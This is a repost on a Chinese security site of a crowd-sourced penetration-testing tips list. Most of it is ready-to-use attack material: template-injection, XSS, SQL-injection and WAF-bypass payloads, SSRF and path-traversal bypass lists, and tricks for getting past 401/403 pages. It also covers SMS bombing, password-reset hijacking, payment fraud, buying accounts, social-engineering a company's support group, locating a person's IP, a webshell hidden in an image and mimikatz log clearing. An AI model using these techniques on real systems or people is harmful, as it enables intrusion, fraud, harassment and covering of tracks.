渗透测试Tips

admin 2022年1月5日23:04:12安全文章评论71 views15703字阅读52分20秒阅读模式

知己知彼,百战不殆

1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。

2、程序溢出,int最大值为2147483647,可尝试使用该值进行整数溢出,观察现象。

3、403,404响应不灰心,尝试使用dirsearch等工具探测目录。

4、验证码简单绕过:重复使用,万能验证码(0000,8888),空验证码,验证码可识别(可用PKAV HTTP Fuzzer工具识别等)

5、短信轰炸绕过:手机号前加+86有可能会绕过,手机号输入邮箱,邮箱处输入手机号

6、如果验证码有实效,可尝试一段时间内重复发送获取验证码,因为有实效,所以有可能会延长验证码的时长。

7、SQL注入时,如果数据库是Mysql,可以尝试使用&&替换and,如:' && '1'='1' %26%26 '1'='1

8、SQL注入时,如果数据库是Mysql,waf过滤了=,可尝试用like替代。如:and 1 like 1

9、JWT格式在http://jwt.calebb.net/可以解密,前提是要知道秘钥,可以尝试构造任意数据,看他会不会有报错信息中携带秘钥信息,可以通过https://github.com/firebase/php-jwt生成JWT。JWT格式header.payload.signature

10、如果开放了redis服务(1234端口),可以尝试使用/actuator/redis/info语句看是否能读取敏感信息,如:http://www.xxx.com:1234/actuator/redis/info

11、Gitlab平台漏洞 - CVE-2020-10977

12、API接口处,可以自己构造参数,POST形式传参,可以尝试构造为JSON格式,记得添加content-type: application/json,一些可尝试参数,page,size,id。

13、手机发送短信时间限制的话,可以在手机号前尝试使用特殊字符,或空格。他的逻辑应该是这样的,用户输入手机号——>后端判断该手机号是否在30秒或者60秒内请求过——>如果没有,判断发送过来的手机号是够是11位的纯数字,如果不是,去掉非数字字符——>和数据库中的手机号比对,是够存在于数据库中,如果存在那么向该手机发送验证码。

14、图片验证码可设置为空,如:code=undefined

15、自动以验证码内容,观察Cookie中,参数中是否有发送给用户的内容,可以尝试更改,可以构造钓鱼链接。

16、模板注入,在{{xxx}}中输入的命令参数可被执行,如:

www.baidu.com/{{1+1}}以Python为例,列出当前目录下所有文件的Payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

17、信息收集,在搜狗搜索中选择微信可以搜索相关企业相关公众号资产。

18、在JS文件中搜索关键字APISwagger UI等等,尝试寻找API接口地址。

19、swagger接口常见路径:

/swagger//api/swagger//swagger/ui//api/swagger/ui//swagger-ui.html//api/swagger-ui.html//user/swagger-ui.html//swagger/ui//api/swagger/ui//libs/swaggerui//api/swaggerui//swagger-resources/configuration/ui//swagger-resources/configuration/security/

20、swagger组件特征固定title:Swagger UI

21、403和401的绕过小技巧:

渗透测试Tips

22、盲测目录是否存在,如果存在该目录可能会自动在URL末尾添加/补全。

23、Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0

24、获取账号:文库,QQ群,github泄露,借/租/买账号。

25、如果泄露阿里云的 AKSK,可以使用AKSKtools工具进一步利用。https://xz.aliyun.com/t/8429 

26、如果遇见后台页面一闪而过,接着让你登录,一般使用了权限认证方式,可以用一下方式进行绕过,或者遇见401,403,302,都可以尝试使用以下方法:

一、GET /xxx HTTP/1.1 à403Host: test.com绕过:GET /xxx HTTP/1.1 à200Host: test.comX-Original-URL: /xxx
二、GET /xxx HTTP/1.1 à403Host: test.com绕过:GET /xxx HTTP/1.1 à200Host: test.comReferer: http://test.com/xxx
三、302跳转:拦截并drop跳转的数据包,使其停留在当前页面。四、前端验证:只需要删掉对应的遮挡模块,或者是验证模块的前端代码。

27、gopher协议使用限制:

渗透测试Tips

28、一款生成gopher协议payload的工具:

https://github.com/firebroo/sec_tools

29、Dict协议写入流程:

1.写入内容; dict://127.0.0.1:6379/set❌test
2.设置保存路径;dict://127.0.0.1:6379/config:set:dir:/tmp/
3.设置保存文件名;dict://127.0.0.1:6379/config:set:dbfilename:1.png
4.保存。dict://127.0.0.1:6379/save

30、CentOS 7系统利用suid提权获取Root Shell

https://www.freebuf.com/articles/system/244627.html

31、xss中标签利用的payload:

<a href=javascript:alert(1)>xx</a>

32、XSS过滤了单引号,等号可以:

①、使用:String.fromCharCode(97,108,101,114,116,40,49,41);为alert(1),该方法输出的结果为字符串,可以使用eval()进行执行,即弹框操作eval(String.fromCharCode(97,108,101,114,116,40,49,41));②、atob函数:eval(atob`YWxlcnQoMSk=`) 为 eval(atob`alert(1)`) 其中`为反引号

33、XSS过滤了单引号,等号以及圆括号,eval:

①、过滤了eval函数可以用其他函数去绕过,如:FunctionconstructorFunction`a${atob`YWxlcnQoMSk=`}`````.constructor.constructor`a${atob`YWxlcnQoMSk=`}```

34、可使用下面命令查看是否处在docker虚拟机中

cat /proc/1/cgroup

35、万能密码试试'=0#

36、CORS漏洞验证,可以使用curl来验证:

curl https://www.xxxx.com -H "Origin: https://test.com" -I检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com

37、在盲测目标系统是否为Shiro时,可以在Cookie中手动构造rememebrMe=xxx,如果返回包中Set-Cookie中存在rememberMe=deleteMe,则证明该系统使用了Shiro,因此可以进一步攻击。 

38、使用正则获取网站中所包含的其他URL:

cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*

39、常见的一些远程命令执行(RCE)参数,详情,请看dicts目录下的RCE-extentions.txt文件。

40、绕过SSRF防护的几个小方法:

A、绕过SSRF限制通过CIDR,如:http://127.127.127.127http://127.0.0.0
B、不完整的地址,如:http://127.1http://0
C、将地址结合在通过特殊字符结合在一起,如:http://1.1.1.1 &@2.2.2.2# @3.3.3.3/urllib : 3.3.3.3
D、绕过解析器,如:http://127.1.1.1:[email protected]:80/
E、绕过localhost通过[::],如:http://[::]:80/http://0000::1:80/

41、几个常用的Google语法:

inurl:example.com intitle:"index of"inurl:example.com intitle:"index of /" "*key.pem"inurl:example.com ext:loginurl:example.com intitle:"index of" ext:sql|xls|xml|json|csvinurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

42、通过favicon的hash来对比相关联的两个网站:

脚本地址:https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py命令:python3 favihash.py -f https://target/favicon.ico -t targets.txt -s

43、一些本地包含参数,详情请看dicts目录下的LFI-extentions.txt文件。

44、在JavaScript文件中可以找一些隐藏的GET参数,比如:

首先,在js文件中找到一些变量,比如:var test="xss"然后,可以尝试使用GET方法构造每一个参数,比如:https://example.com/?test=”xsstest本方法可能会发现一些XSS

45、使用github dorks帮助我们寻找一些敏感信息,比如:

extension:pem privateextension:ppk privateextension:sql mysql dump passwordextension:json api.forecast.ioextension:json mongolab.comextension:yaml mongolab.comextension:ica [WFClient] Password=extension:avastlic “support.avast.com”extension:js jsforce conn.loginextension:json googleusercontent client_secret“target.com” send_keys“target.com” password“target.com” api_key“target.com” apikey“target.com” jira_password“target.com” root_password“target.com” access_token“target.com” config“target.com” client_secret“target.com” user auth通过上述语法,可以搜索到一些敏感的私钥,一些SSH登录私钥,mysql的数据库密码,API key等等。另外推荐一个脚本:https://github.com/techgaun/github-dorks

46、SSRF常见的参数,详情请看dicts目录下的SSRF-extensions.txt文件。

47、通过添加.json后缀,泄露一些敏感信息,比如:

一次正常请求:GET /ResetPassword HTTP/1.1{"email":"[email protected]"}响应:HTTP/1.1 200 OK
添加.json后缀的请求:GET /ResetPassword.json HTTP/1.1{"email":"[email protected]"}响应:HTTP/1.1 200 OK{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}原链接:https://twitter.com/SalahHasoneh1/status/1293918353971531776

48、如果响应为401,可以试试在请求头中添加X-Custom-IP-Authorization: 127.0.0.1

49、利用火绒剑,配合微信发语音的方式,可以获取该人的登录IP。

50、目录穿越,敏感文件读取一些Payload:

..WINDOWSwin.ini..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:.?.?.?etcpasswd../../boot.ini%0a/bin/cat%20/etc/passwd\&apos;/bin/cat%20/etc/passwd\&apos;..%c1%afetc%c1%afpasswd

51、在访问admin路径面板时可以通过添加%20,来绕过,具体如下:

target.com/admin –> HTTP 302 (重定向到登录页面)target.com/admin%20/ -> HTTP 200 OKtarget.com/%20admin%20/ -> HTTP 200 OKtarget.com/admin%20/page -> HTTP 200 OK

52、在重置密码的地方,可以尝试添加另外一个次要的账号,比如,手机号,邮箱号等等,比如:

a、构造两个参数:  [email protected]&[email protected]b、使用抄送方式:  [email protected]%0a%0dcc:[email protected]c、使用分隔符:  [email protected],[email protected]  [email protected]%[email protected]  [email protected]|[email protected]d、不使用域名:email=victime、不使用顶级域名:[email protected]f、JSON情况:{"email":["[email protected]","[email protected]"]}

53、如果有利用邮箱重置密码功能的情况,而且还是JSON传输的情况下,使用SQLmap跑注入,可以将*(星号)放在@之前,比如:

{“email”:”test*@xxx.com”}或者在*(星号)这个地方进行手注原因大家可以看这里:https://tools.ietf.org/html/rfc3696#section-3
原文链接:https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/#2_bypass_email_filter_leading_to_sql_injection_json

54、可以获取目标站点的favicon.ico图标的哈希值,然后配合shodan进行目标站点资产收集,因为每个目标站点的favicon.ico图标的哈希值可能是固定值,因此可以通过该方法从shodan,fofa等等去寻找更多资产。简单的用法:

#python 3import mmh3 import requestsimport codecsresponse = requests.get("https://www.baidu.com/favicon.ico")favicon = codecs.encode(response.content,"base64")hash = mmh3.hash(favicon)print(hash)
或使用下面这个github项目:https://github.com/devanshbatham/FavFreak
shodan搜索语句:http.favicon.hash:哈希值fofa搜索语句:icon_hash="-247388890"(但仅限于高级用户使用)
原文链接:https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/#8_database_of_500_favicon_hashes_favfreak

55、绕过403和401的小技巧:

a、添加以下请求头,比如:X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For等等;有可能会有一些白名单IP地址可以访问这些敏感数据。
b、如果使用GET方法访问某些路径,返回403,可以先访问允许访问的路径,然后在请求头中,添加下面的头:X-Original-URL: /adminX-Override-URL: /adminX-Rewrite-URL: /admin
c、可以使用下面这些Payload试试/accessible/..;/admin/.;/admin/admin;//admin/~/./admin/.//admin?param/%2e/admin/admin#
原文链接:https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/#11_tips_on_bypassing_403_and_401_errors

56、如果访问/.git目录返回403,别忘了进一步访问下面的目录,比如:/.git/config

57、使用通配符绕过WAF,如果WAF拦截了RCE,LFI的payload,我们可以尝试使用通配符来绕过,比如:

/usr/bin/cat /etc/passwd ==  /???/???/c?t$IFS/?t?/p?s?wd? = 任意的单个字符* = 任意字符串,也包含置空的字符串通配符在常见的系统中都适用,另外我们可以使用$IFS特殊变量取代空白$IFS = 内部字段分隔符 = [space], [tab] 或者 [newline]
cat /etc$u/p*s*wd$u
小例子,执行/bin/cat /etc/passwd的写法:/*/?at$IFS/???/???swd/****/?at$IFS/???/*swd/****/?at$IFS/???/*******swd
原文地址:https://www.infosecmatter.com/bug-bounty-tips-9-nov-16/#8_waf_bypass_using_globbing

58、绕过403的一个BurpSuit插件,地址:

https://github.com/sting8k/BurpSuite_403Bypasser

59、SSRF bypass列表,基于localhost(127.0.0.1),如下:

http://127.1/http://0000::1:80/http://[::]:80/http://2130706433/http://[email protected]http://0x7f000001/http://017700000001http://0177.00.00.01http://⑯⑨。②⑤④。⑯⑨。②⑤④/http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/http://②⑧⑤②⓪③⑨①⑥⑥:80/http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/http://0xd8.0x3a.0xd6.0xe3http://0xd83ad6e3http://0xd8.0x3ad6e3http://0xd8.0x3a.0xd6e3http://0330.072.0326.0343http://000330.0000072.0000326.00000343http://033016553343http://3627734755http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37http://216.0x3a.00000000326.0xe3
原文链接:https://www.infosecmatter.com/bug-bounty-tips-10-dec-24/#13_ssrf_bypass_list_for_localhost_127001

60、对于Apache shiro的CVE-2020-17523的未授权访问,是由于Spring+shiro结合造成的漏洞,可在路径后面添加%20,尝试访问该路径内容,造成未授权访问操作。

61、在一些验证码登录,找回密码等地方需要输入手机号,邮箱号的话,尝试配合SQL注入联合查询方式,填写可控手机号,实际情况实际分析。

62、密码爆破不如意,试试"密码喷洒攻击(Password Spray Attack)"法,多来收集用户名。

63、Exchange的下的目录以及功能介绍:

/autoDiscover/  自Exchange Server 2007开始推出的一项自动服务,用于自动配置用户在Outlook中邮箱的相关设置,简化用户登陆使用邮箱的流程。/ecp/“Exchange Control Panel”    Exchange管理中心,管理员用于管理组织中的Exchange的Web控制台/eWS/“Exchange Web Services”    Exchange Web Service,实现客户端与服务端之间基于HTTP的SOAP交互/mapi/    Outlook连接Exchange的默认方式,在2013和2013之后开始使用,2010 sp2同样支持/microsoft-Server-ActiveSync/    用于移动应用程序访问电子邮件/OAB/“Offline Address Book”    用于为Outlook客户端提供地址簿的副本,减轻Exchange的负担/owa/“Outlook Web APP”    Exchange owa 接口,用于通过web应用程序访问邮件、日历、任务和联系人等/powerShell/  用于服务器管理的Exchange管理控制台/Rpc/  早期的Outlook还使用称为Outlook Anywhere的RPC交互

64、针对于Exchange的账号格式,可以尝试:domainusername、domian.comusername、username

65、一个验证域名是否使用了Exchange的脚本:https://github.com/vysecurity/checkO365

66、使用云函数的多出口特性,可以将其作为代理池来用。思路大概为:

流程:浏览器请求数据 -> 编写代理 -> 通过代理将数据传给api网关 -> api网关触发云函数并将参数作为event传入进云函数内 (然后反向流程将数据返回到浏览器中)所以我们大致编写代码步骤为:1、编写云函数,使用api网关做触发器,云函数主要处理api网关传来的数据,再将访问返回的数据包传会给api网关2、编写代理代码,主要接收浏览器传来的数据,并将数据整理传给api网关,然后回到第一步。注:这是一个思路,具体实现不局限于此,各位大佬各显神通吧~

67、常见的逻辑漏洞checklist

注册:

短信轰炸/验证码安全问题/密码爆破/邮箱轰炸用户任意注册/批量注册枚举用户名XSS (在这里的话其实就是说遇到框你就插xss即可)

登录:

短信轰炸/验证码安全问题/密码爆破/邮箱轰炸SQL注入撞库抓包把password字段修改成空值发送认证凭证替换/比如返回的数据包中包含账号,修改账号就能登陆其他账号Cookie仿冒修改返回包的相关数据,可能会登陆到其他的用户

找回密码:

短信邮箱轰炸/短信邮箱劫持重置任意用户密码/验证码手机用户未统一验证直接跳过验证步骤

购买支付/充值(主要还是利用抓包需要仔细的去看每一个可用参数):

交易金额/数量修改,替换支付模块 (这里也就是更换了支付的模块金额**)**交易信息订单编码/导致信息泄露整数溢出,int最大值为2147483647,超过最大值修改充值账户支付绕过

抽奖活动:

刷奖品/积分并发(同时执行,看是否会多次减少次数)

优惠券/代金券:

并发逻辑漏洞(burp或者fd批量获取优惠劵等)修改优惠券金额/数量

订单信息:

订单信息遍历/泄露订单信息泄露导致用户信息泄露删除他人订单

会员系统:

修改个人信息上传文件,上传带弹窗的html如遇上上传xlsx/docx,可能存在xxe,上传恶意的文档盲测图片上传也可能遇到imagereagick命令执行,上传恶意图片视频上传如果使用ffmpeg<3.2.4(视频按帧分割成图片),上传恶意avi盲测ssrf用户横向越权访问/遍历/导致用户信息泄露SQL注入/个人简介处存储XSS 个人信息注册的名称也可以插入xss

传输过程:

明文传输账号密码修改信息处无session/token导致csrfPOST/COOKIE注入

评论:

POST注入/存储XSS无session/token导致CSRF

68、常见的漏洞位置

验证码问题:

万能验证码返回包中存在验证码删除验证码或者cookie中的值可以爆破账号密码

短信轰炸:

一直重放删除修改cookie,重放数据包遍历参数发送数据包手机号后面加空格或者前面加其他的比如+86或者逗号分号等,然后重发数据包请求参数修改大小写,或者添加请求参数比如&id=1一个站的登陆处可能做了防护,但是再找回密码处可能没有安全防护,或者在注册流程中没有安全防护,所以说多测试接口如果对手机号一天次数进行了限制的话,还可以在进行发送一次短信,DO intercept之后修改为成功回显

水平越权:

主要登陆后还是修改参数,主要找到**多个接口**不断测试关注网页源代码,有时候会有表单,但是被bidden(隐藏标签)给隐藏起来了,可以修改返回包然后尝试获取数据检测多个账号,主要分析请求参数

数据泄露:

在找回密码处,填写数据后抓包查看返回信息,有可能存在敏感数据返回

任意用户密码重置:

目前大部分都是在修改密码处参数修改有些是前端验证

69、支付逻辑漏洞

(该部分参考Freebuf文章,作者名字:听闻他叫无剧)

1.边界值问题 : 正常的逻辑是用户购买商品,然后价格累加得到一个总价进行扣款。这个时候就会产生逻辑问题:如果说用户购买的商品是负数了,那么计算的总数就是负数。反过来钱给用户                2.顺序执行缺陷:正常的逻辑是a-b-c-d 循环渐进的进行流程操作。这个时候就会产生逻辑问题:可以直接从中绕过某一个过程进入到下一步操作。如果说有一项是支付的操作,那么也就会产生支付绕过,如果说有一项是验证机制,就会绕过验证直接进入下一步。                3.金额直接传输导致篡改:直接对下单的金额进行修改值,这里可以使用fd或者burp抓包                4.确定支付之后还可以加入购物车:把商品放入购物车点击下单支付,会跳转到微信,支付宝等第三方支付平台。这个时候还可以继续在购物车中加入商品,支付结束之后,商家发放的商品是现在的购物车里面的东西。 5.请求重放:购买成功之后,继续重放请求,可以让购买的商品一直增加。购买成功之后,会有一个银行对商户网站跳转的过程,如果反复进行操作,有几率会导致商品反复购买和增加,但是不需要付更多的钱。
6.请求参数干扰:金钱做了签名认证之后,修改后不通过,但是在里面仍然会有一个参数对金额产生影响导致问题产生。
7.订单替换:订单替换发生在支付之后的事件处理,同时向服务器发起二次支付请求一个多一个少,支付金额少的,然后支付之后进行替换,告知服务器订单支付完成,并且过程可以反复的回放。
8.欺诈:需要两个收款人,一个是正常的商家,一个是伪造的商家
9.单位替换:产生在paypal类似的国际支付的场景。
10.用户替换:在支付过程中发生用户替换现象,首先登陆自己的账户,然后取得另外一个人的账户名等有效信息,在业务流程中用对方的用户名替换自己的用户名,用对方的余额购买完成后,再替换自己的账户名,这样就形成别人的钱买自己的东西 11.强制攻击:强制攻击发生在暴力破解的情况下,如果一个商家运用一个自己的网店,接入第三方支付接口,由于设计上的不当导致商家与第三方支付约定的密钥Key可以单独被MD5加密,导致可以使用MD5碰撞技术对密钥进行破解,攻击者可以设计简单的密钥加密信息使得MD5加密是可以用MD5碰撞技术进行暴力破解。 12.秘钥泄漏:内置支付功能的app为了设计上的方便有可能会把Md5或者是RSA的私钥泄漏导致攻击者反编译apk之后获取密钥信息使得交易信息可以被篡改。 13.函数修改:apk反编译之后的函数修改,可能导致商家在最后一步向支付方提交订单时未验证信息的准确性,仍然被篡改。 14.heart bleed:SSL(安全套接层)协议是使用最为普遍网站加密技术,而OpenSSL则是开源的 SSL 套件,为全球成千上万的web服务器所使用。Web服务器正是通过它来将密钥发送给访客然后在双方的连接之间对信息进行加密。URL中使用 https打头的连接都采用了SSL加密技术。在线购物、网银等活动均采用SSL技术来防止窃密及避免中间人攻击。

2021年01月21日 - 更新分界线,整理了来自一些师傅们留言贡献的渗透测试Tips:

1、至于登陆后台的网站,如果有重置密码功能,但被禁用了,可以找该公司技术qq群,假装用户忘记密码,提重置密码需求,让开通功能,可以验证下是否有任意密码重置漏洞。Author By:六六

2、如果遇见后台页面一闪而过,接着让你登录,一般使用了权限认证方式: 三、302跳转:拦截并drop跳转的数据包,使其停留在当前页面。这个操作我每次试都是不成功的,但是可以修改返回的302为200,然后删除掉Location字段。Author By:Jokong

3、任意文件下载:/porc/self/cmdline --当前进程的cmdline参数,/var/lib/mlocate/mlocate.db --全文件路径。Author By:phage

4、容易发生短信轰炸的几个业务场景以及绕过方法:Author By:登登登Y

①:登录处 ②:注册处 ③:找回密码处 ④:绑定处 ⑤:活动领取处 ⑥:独特功能处 ⑦:反馈处一般绕过限制方法:手机号码前后加空格,86,086,0086,+86,0,00,/r,/n, 以及特殊符号等修改cookie,变量,返回138888888889   12位经过短信网关取前11位,导致短信轰炸

5、注入的时候可以试试--%0a union --%0a select 尝试绕过。Author By:zhaoze

6、注入的时候,多看order by,group by,{$var}。Author By:oops33

7、手机号前加若干+会造成短信轰炸。Author By:ptgeft

8、如果在旁站中发现短信验证码在response中出现,可以试试主站或者其他站点中验证码是否通用。Author By:Alex125

9、获取短信验证码时,用逗号隔开两个手机号,有可能两个手机号能获取到同一个验证码。Author By:Scorpion


2021年01月26日 - 更新分界线,整理了来自一些师傅们留言贡献的渗透测试Tips:

1、测试注入 and ord(0x1) ->true,and ord(0x0) ->false。Author By:oops33

2、遇到文件读取漏洞,除了读取配置文件,还可以尝试读取网站文件,来进行代码审计,说不定就有开发疏忽的漏洞在源代码里。Author By:iwtbhero

3、使用python快速开启http服务器:Author By:ffffffff0x

基于python2.x,命令如下:python -m SimpleHTTPServer 8000# 在当前目录起个 8000 端口的 HTTP 服务
基于python3.x,命令如下:python -m http.server 8000

4、渗透时尽量不要暴露自己的 IP 地址,挂代理是必须的。Author By:ffffffff0x

  • linux 下要查看自己终端是否走代理可以 curl https://ifconfig.me/ 看下返回的 IP 地址

  • windows 就直接访问 https://ifconfig.me/ 即可

5、整理字典时,推荐用linux下的工具快速合并和去重。Author By:ffffffff0x

cat file1.txt file2.txt fileN.txt > out.txtsort out.txt | uniq > out2.txt

2021年01月29日 - 更新分界线,整理了来自一些师傅们留言贡献的渗透测试Tips:

1、注入时使用url编码对&&和||编码可以绕过一些拦截。例如:Author By:jettt

1' and 1=1--+1' %26%26 True--+同理其他编码也可以试一个遍。

2、信息收集的时候可以使用fofa查看证书看是否是真实IP 语法 cert="baidu.com"。Author By:zhaoze

3、将普通图片1.jpg 和 木马文件shell.php ,合并成木马图片2.jpg:Author By:Lstarx

$ copy /b 1,jpg+shell.php 2.jpg

4、mimikatz小功能:Author By:Rive丶

多用户登录3389:ts::multirdp清除日志:event::drop粘贴板信息:misc::clip

2021年02月04日 - 更新分界线,整理了来自一些师傅们留言贡献的渗透测试Tips:

以下来自xinxin999师傅的贡献:

1、{“id”:111} --> 401 Unauthriozied {“id”:[111]}-->200 OK {“id”:{“id”:111}} --> 200 OK {“id”:{“id”:[111]}} --> 200 OK

2、测试注入的时候,可以psot/get更换,自定义一些参数,删除一些参数,加上分块,以及burp有时候有这种口口符号,可以删除在测payload。

3、wp的站,如果扫到,xmlrpc这个文件,我们可以借鉴这篇文章https://blog.csdn.net/u012206617/article/details/109002948

4、看见同行的马,我们可以加一些参数让其密码溢出来。例如a.asp?profile=a

5、如果注入出的md5只有31位,可以去掉前8位和后8位,用中间的16位

以下来自Wafer师傅的贡献:

6、快速web路径,sql注入下找路径。

dir /s /b e:”Web.config"  type e:b2cexamweb.config  

7、列出网站物理路径

%systemroot%system32inetsrvappcmd.exe list vdir 

8、列出机器所有盘符(禁止访问的盘无法获取)

 wmic logicaldisk where drivetype=3 get deviceid

以下来自lidasimida师傅的贡献:

9、burpsuite的intruder模块的爆破功能:

ssrf绕过举例:http://127.0.0.1:0~65535, 有时间的话可以尝试爆破多个端口来爆破,里面的地址也可以更改为已知确认的内网地址。还有就是http://127.0.0.1/a 的a目录进行枚举,有些是可以枚举成功的,有些是枚举不了的,这个a目录最好为已知的403目录,如果403绕不过去可以搜集为临时字典,然后使用爆破。

目录穿越绕过举例:不一定是/../etc/password就可以绕过,建议可以配置字典,第一个为/..第二个为/../..以此类推来爆破,爆破还可以选中intruder——payloads——payload encoding,编码爆破也是可以的,目录穿越来爆破还是不错的。

字典组合模块:payloads——payload sets——custom iterator

10、dnslog外带注入

shiro反序列化、fastjson反序列化、sql注入外带注入、xss外带注入、内网漫游(nginx的反向代理会导致内网漫游,在请求头添加dnslog地址即可)

11、密码解密小技巧

输入同一个密码多次抓包发现密码固定值加密,可以搜集多个弱口令进行用户名爆破

输入同一个密码多次抓包发现密码不是固定值加密,可以将多组密码对比,可能奇数位或偶数位一致,之前审计一组加密代码发现,减去前4位和后8位共12位随机数之后,再减去奇数位的随机数,得到偶数位的编码格式为base64编码。(https://www.freebuf.com/articles/web/261440.html)

12、信息收集

置换请求头,插件User-Agent switch,可以更改请求方式访问Android、iPhone、ipad等可以访问的页面,可能会访问到浏览器访问不到的信息。

白马单绕过插件:X-Forwarded-For Header,建议测试后关闭,有些网站你勾选了会无法正常访问。

13、上传的请求包有两个请求参数同为php,修改其中一个为1.jpg,另外一个为1.php

将文件后缀做个编码尝试,看看后端会不会有解码,或者单独将文件后缀一个字母或两个字母做编码,编码可以是十六进制、Unicode编码、base64编码单独。

在1.jpg.php的.php前面插入多行换行符或者垃圾数据,插入多个/试试。文件后缀使用通配符*或者?或者其他。


14、 信息收集的时候可以使用fofa查看证书看是否是真实IP 语法 cert="baidu.com"。Author By:zhaoze

原文链接:https://github.com/Power7089/PenetrationTest-Tips


欢迎关注 系统安全运维 


每日坚持分享好工具好资源,麻烦各位师傅文章底部给点个“再看”,感激不尽渗透测试Tips

本文始发于微信公众号(系统安全运维):渗透测试Tips

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日23:04:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试Tips https://cn-sec.com/archives/465393.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: